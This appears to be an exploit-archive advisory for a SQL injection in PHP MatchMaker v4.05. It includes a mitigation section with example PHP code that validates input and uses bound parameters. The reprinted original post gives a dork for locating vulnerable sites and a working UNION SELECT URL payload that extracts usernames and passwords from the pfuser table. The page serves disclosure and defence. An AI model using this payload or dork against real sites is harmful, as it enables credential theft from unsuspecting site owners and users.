vendor: PHP MatchMaker
by: SHiKaA
CVSS: N/A
Remote SQL Injection
CWE: 89
Product Name: PHP MatchMaker
Affected Version From: v4.05
Affected Version To: v4.05
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Powie’s PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'edit' of the 'matchdetail.php' script. This can be used to extract data from the database, modify data, delete data, or even execute administration operations on the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
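
The mitigation above, sketched for a `matchdetail.php`-style lookup as an added example (not code from PHP MatchMaker or from the advisory): the `edit` value is accepted only as a positive integer and is then passed to the database as a bound parameter. The `matches` table, its columns and both function names are assumptions, since the real schema is not shown on this page; the sample inputs are constructed.

```php
<?php
// Added example, not PHP MatchMaker's code. Table "matches" and its columns are hypothetical.

/** Returns a positive integer id, or null when the raw value is not a plain integer. */
function parse_match_id($raw): ?int
{
    if (!is_string($raw)) {   // rejects array input such as edit[]=1
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Looks the match up with a bound parameter, so the value never becomes SQL text. */
function load_match(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, home, guest FROM matches WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE matches (id INTEGER PRIMARY KEY, home TEXT, guest TEXT)');
$db->exec("INSERT INTO matches VALUES (1, 'Team A', 'Team B')");

// Constructed inputs: a valid id, a value with trailing SQL text, and edge cases.
$inputs = ['1', '-1 UNION SELECT 0', '1 OR 1=1', '', '999', ['1']];
foreach ($inputs as $raw) {
    $id = parse_match_id($raw);
    if ($id === null) {
        // In a real handler: respond with HTTP 400 and log the request.
        echo 'rejected: ' . json_encode($raw) . "\n";
        continue;
    }
    $row = load_match($db, $id);
    echo "id $id -> " . ($row === null ? 'not found' : json_encode($row)) . "\n";
}
```

Only `'1'` and `'999'` reach the query; every other input is rejected before any SQL runs. The bound parameter is what keeps the query safe, and the integer check gives an early, loggable rejection on top of it.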

Exploit-DB raw data:

#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Vendor site : http://www.powie.de
#                                                                     
#Version : v4.05
#
#===============================================================================================
#
#DORK :  "Powie's PSCRIPT MatchMaker 4.05"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#
#================================================================================================
#Discovered By : SHiKaA
#
#Contact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]